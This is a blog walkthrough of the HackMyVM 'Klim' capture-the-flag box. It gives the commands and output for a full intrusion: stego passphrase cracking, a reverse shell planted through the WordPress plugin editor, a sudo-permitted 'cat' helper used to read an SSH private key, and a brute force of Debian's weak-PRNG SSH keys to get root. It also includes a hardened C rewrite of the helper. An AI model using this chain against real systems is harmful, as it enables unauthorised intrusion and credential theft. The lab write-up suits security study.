Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Klim Walkthrough

Scan ports.

 nmap -sV -sC -p- -oN ports.log
 Nmap scan report for
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80 with a directory brute-forcer: found WordPress.

 /index.html           (Status: 200) [Size: 11331]
 /wordpress            (Status: 301) [Size: 320] [-->]

Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-content/uploads, found an image.

 ~ wget

Brute-force the steghide passphrase with stegseek and a wordlist; it extracts the hidden file, dump.

 ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)
 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump

Found login credentials in dump; the password is URL-encoded, so decode it first.

 ~ cat dump|grep pwd 
 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"

Log in to WordPress; in the Plugin Editor, edit one of the plugin's PHP files and add your PHP reverse-shell code to its source.

Then request the edited file with curl and catch the reverse shell.

 ~ curl 
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo -l as www-data.

 www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool

Decompile tool and read the pseudocode. It simply builds the string "cat " + argv[1] and runs it, so with the NOPASSWD sudo rule it reads any file klim can read.

 #include <stdlib.h>
 #include <string.h>

 // IDA pseudocode of /home/klim/tool: dest ends up holding "cat <argv[1]>"
 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   size_t v3; // rbx
   size_t v4; // rax
   char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
   char *dest; // [rsp+20h] [rbp-20h]
   size_t size; // [rsp+28h] [rbp-18h]

   strcpy(s, "cat ");
   v3 = strlen(s);
   size = v3 + strlen(argv[1]) + 1;      // room for "cat " + argv[1] + NUL
   dest = (char *)malloc(size);
   strncpy(dest, s, size);
   v4 = strlen(s);
   strncat(dest, argv[1], size - v4);    // dest is now "cat <argv[1]>"
   // the call that hands dest to the shell is not part of this excerpt
   return 0;
 }
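What makes tool dangerous is not the buffer arithmetic (the size computation above is correct) but that user input is spliced into a shell command executed as another user. The program below is an added example, not the binary from the box or the author's code: `build_shell_command` reproduces the string construction from the decompile, and `cat_allowed_file` is the hardened form, which accepts only a bare filename, confines it to a hypothetical `ALLOWED_DIR`, and execs `/bin/cat` with a fixed argv so no shell ever parses the argument.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical directory the helper is allowed to serve files from. */
#define ALLOWED_DIR "/home/klim/public"

/* Reproduces the construction from the decompile: "cat " + arg.
 * The length arithmetic is fine; the weakness is that the result is meant
 * for a shell, so arg is interpreted as syntax instead of treated as data. */
char *build_shell_command(const char *arg) {
    const char prefix[] = "cat ";
    size_t size = strlen(prefix) + strlen(arg) + 1;
    char *dest = malloc(size);
    if (dest == NULL) return NULL;
    strncpy(dest, prefix, size);
    strncat(dest, arg, size - strlen(prefix));
    return dest;
}

/* Lexical allowlist for the argument: a bare filename, no leading dot (blocks
 * ".", ".." and dotfiles such as .ssh), no separators, no shell metacharacters,
 * printable ASCII only. Returns 1 if the name is acceptable. */
int filename_is_safe(const char *name) {
    if (name == NULL || *name == '\0' || strlen(name) > 255) return 0;
    if (name[0] == '.') return 0;
    for (const char *p = name; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c < 0x20 || c > 0x7e) return 0;               /* control / non-ASCII */
        if (strchr("/\\;|&$`\"'<>(){}*?![]~ \t", c)) return 0;
    }
    return 1;
}

/* Builds ALLOWED_DIR/<name>, or returns NULL when the name is rejected.
 * The caller frees the result. */
char *resolve_allowed_path(const char *name) {
    if (!filename_is_safe(name)) return NULL;
    size_t size = strlen(ALLOWED_DIR) + 1 + strlen(name) + 1;
    char *path = malloc(size);
    if (path == NULL) return NULL;
    snprintf(path, size, "%s/%s", ALLOWED_DIR, name);
    return path;
}

/* Hardened replacement for system(): fork and exec /bin/cat with a fixed
 * argv. The filename travels as a single argument and is never re-parsed. */
int cat_allowed_file(const char *name) {
    char *path = resolve_allowed_path(name);
    if (path == NULL) {
        fprintf(stderr, "refused: %s\n", name ? name : "(null)");
        return 1;
    }
    pid_t pid = fork();
    if (pid == 0) {
        char *const cat_argv[] = { "/bin/cat", path, NULL };
        execv("/bin/cat", cat_argv);
        _exit(127);                                      /* exec failed */
    }
    free(path);
    if (pid < 0) return 1;
    int status;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : 1;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <filename>\n", argv[0]);
        return 2;
    }
    return cat_allowed_file(argv[1]);
}
```

Compile with `cc -Wall tool_fixed.c -o tool_fixed`; `./tool_fixed notes.txt` prints the file from `ALLOWED_DIR`, while `./tool_fixed .ssh/id_rsa` is refused before anything is executed. Even with the lexical filter, a helper like this should not be exposed through a NOPASSWD sudo rule unless the served directory is genuinely public.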

Use tool via sudo to read the SSH private key of user klim.

 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa

Log in over SSH as klim with that key.

 ~ ssh klim@ -i id_rsa 
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found something in /opt; following the author's hint there, look for OpenSSL exploits.

 ~ searchsploit  openssl                                                                                   ...
 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH                                                                                           | linux/remote/

Follow the steps in the PoC (EDB-ID 5622): it ships the pre-generated weak keys from the Debian OpenSSL predictable-PRNG bug and tries each one against root over SSH until one is accepted.

  tar -jxvf 5622.tar.bz2
  python rsa/2048 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec
 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005
 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec

Log in as root with the matching key.

 ~ ssh root@ -i 54701a3b124be15d4c8d3cf2da8f0139-2005
 root@klim:~# id;hostname
 uid=0(root) gid=0(root) groupes=0(root)
